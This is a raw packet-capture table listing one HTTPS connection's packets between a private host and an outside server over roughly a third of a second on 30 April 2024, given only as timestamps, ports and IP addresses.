Apr 30, 2024 07:44:22.286159992 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.292340040 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.292360067 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.292424917 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.292442083 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.292491913 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.299243927 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.299273014 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.299346924 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.299380064 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.299406052 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.299424887 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.306190014 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.306210041 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.307670116 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.307681084 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.307725906 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.312149048 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.312172890 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.312222004 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.312264919 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.312289953 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.312321901 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.318016052 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.318036079 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.318084002 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.318120003 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.318129063 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.318162918 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.324261904 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.324278116 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.324320078 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.324337959 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.324368000 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.324385881 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.330852985 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.330869913 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.330933094 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.330950022 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.331000090 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.336334944 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.336350918 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.336420059 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.336436033 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.336486101 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.342662096 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.342679024 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.342735052 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.342756987 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.342781067 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.342816114 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.348417997 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.348434925 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.348531008 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.348546028 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.348603964 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.353657961 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.353677034 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.353727102 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.353739977 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.353766918 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.353789091 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.358819008 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.358839035 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.358890057 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.358907938 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.358920097 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.358964920 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.364752054 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.364769936 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.364809036 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.364826918 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.364859104 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.364877939 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.370177031 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.370194912 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.370269060 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.370301962 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.370328903 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.370348930 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.375334978 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.375353098 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.375435114 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.375452995 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.375507116 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.381820917 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.381841898 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.381917000 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.381934881 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.381964922 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.381987095 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.387048960 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.387063980 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.387137890 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.387152910 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.387202024 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.393110037 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.393125057 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.393310070 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.393326044 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.393383980 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.397871017 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.397892952 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.397969961 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.397986889 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.398049116 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.403106928 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.403136015 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.403194904 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.403208971 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.403248072 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.403266907 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.407783985 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.407799959 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.407866955 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.407881021 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.407932997 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.412941933 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.412961960 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.413041115 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.413065910 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.413119078 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.418145895 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.418164015 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.418220043 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.418239117 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.418282986 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.422441959 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.422457933 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.422636032 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.422661066 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.422714949 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.426676989 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.426693916 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.426778078 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.426786900 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.426827908 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.431246996 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.431262970 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.431328058 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.431340933 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.431384087 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.436145067 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.436162949 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.436227083 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.436237097 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.436279058 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.440427065 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.440459967 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.440535069 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.440548897 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.440604925 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.444998026 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.445024967 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.445128918 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.445146084 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.445204973 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.449628115 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.449646950 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.449712992 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.449728012 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.449778080 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.453079939 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.453099012 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.453164101 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.453178883 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.453228951 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.456684113 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.456701040 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.456784010 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.456799030 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.456852913 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.461460114 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.461478949 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.461556911 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.461572886 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.461627007 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.465239048 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.465267897 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.465317965 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.465333939 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.465362072 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.465380907 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.469321012 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.469338894 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.469399929 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.469415903 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.469461918 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.473603010 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.473619938 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.473685026 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.473699093 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.473746061 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.477262974 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.477278948 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.477350950 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.477365971 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.477430105 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.480846882 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.480865955 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.480937004 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.480952024 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.481003046 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.484411001 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.484426975 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.484632969 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.484648943 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.484698057 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.488804102 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.488821983 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.488905907 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.488922119 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.488969088 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.492223978 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.492242098 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.492331028 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.492347002 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.492393017 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.495635033 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.495652914 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.495733023 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.495748997 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.495800972 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.499752998 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.499769926 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.499840021 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.499855042 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.499907017 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.503078938 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.503117085 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.503170013 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.503185034 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.503210068 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.503228903 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.506339073 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.506354094 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.506401062 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.506414890 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.506453991 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.506453991 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.509551048 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.509566069 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.509632111 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.509649038 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.509697914 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.513557911 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.513575077 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.513638973 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.513653040 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.513704062 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.516644001 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.516661882 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.516736984 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.516736984 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.516755104 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.516803026 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.519808054 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.519824982 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.519886017 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.519906044 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.519928932 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.519946098 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.523847103 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.523866892 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.523921967 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.523940086 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.523962975 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.523982048 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.526740074 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.526765108 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.526926041 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.526947021 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.526997089 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.529701948 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.529726982 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.529797077 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.529818058 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.529839993 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.529863119 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.532905102 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.532922983 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.532963037 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.532972097 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.533000946 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.533023119 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.535706043 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.535722971 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.535780907 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.535789967 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.535830021 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.539478064 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.539494991 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.539566040 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.539573908 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.539613008 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.542372942 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.542390108 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.542449951 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.542458057 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.542496920 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.545715094 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.545734882 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.545795918 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.545804024 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.545830011 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.545850039 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.548523903 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.548538923 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.548589945 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.548599005 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.548639059 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.551543951 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.551568985 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.551611900 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.551635981 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.551641941 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.551677942 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.554172039 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.554187059 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.554265022 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.554280043 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.554332018 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.557663918 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.557679892 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.557742119 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.557755947 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.557807922 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.564920902 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.564939022 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.564989090 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.565011978 CEST	49722	443	192.168.2.8	37.27.87.155
Apr 30, 2024 07:44:22.565027952 CEST	443	49722	37.27.87.155	192.168.2.8
Apr 30, 2024 07:44:22.565068007 CEST	49722	443	192.168.2.8	37.27.87.155
